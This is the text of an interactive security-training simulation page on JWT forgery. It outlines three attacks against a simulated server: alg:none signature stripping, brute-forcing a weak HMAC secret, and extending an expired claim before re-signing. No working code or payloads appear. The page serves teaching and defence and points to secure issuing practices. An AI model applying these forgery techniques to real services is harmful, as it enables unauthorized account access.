EncryptCodecencryptcodec
Simulations/JWT Forgery

JWT Forgery

Intermediate

Exploit three real JWT vulnerabilities — alg:none bypass, weak secret brute force, and claim tampering. Each attack forges an admin token and gets a 200 OK from the simulated server.

Progress:
1
alg:none Attack
2
Weak Secret Brute Force
3
Expired Claim Tampering
1
alg:none Attack
Strip the signature and change alg to none — the server accepts unsigned tokens.
Attack terminal
Click "Execute alg:none Attack" to run…
2
Weak Secret Brute Force
The server uses 'secret' as its HMAC key. Find it and forge an admin token.
Attack terminal
Click "Brute Force Secret" to run…
3
Expired Claim Tampering
The token has an expired exp claim. Extend the expiry and re-sign with the known secret.
Attack terminal
Click "Tamper exp Claim" to run…

Hints

alg:none Attack hints
Weak Secret Brute Force hints
Expired Claim Tampering hints
How to issue JWTs securely
Algorithm pinning, strong secrets, and short expiries

Frequently Asked Questions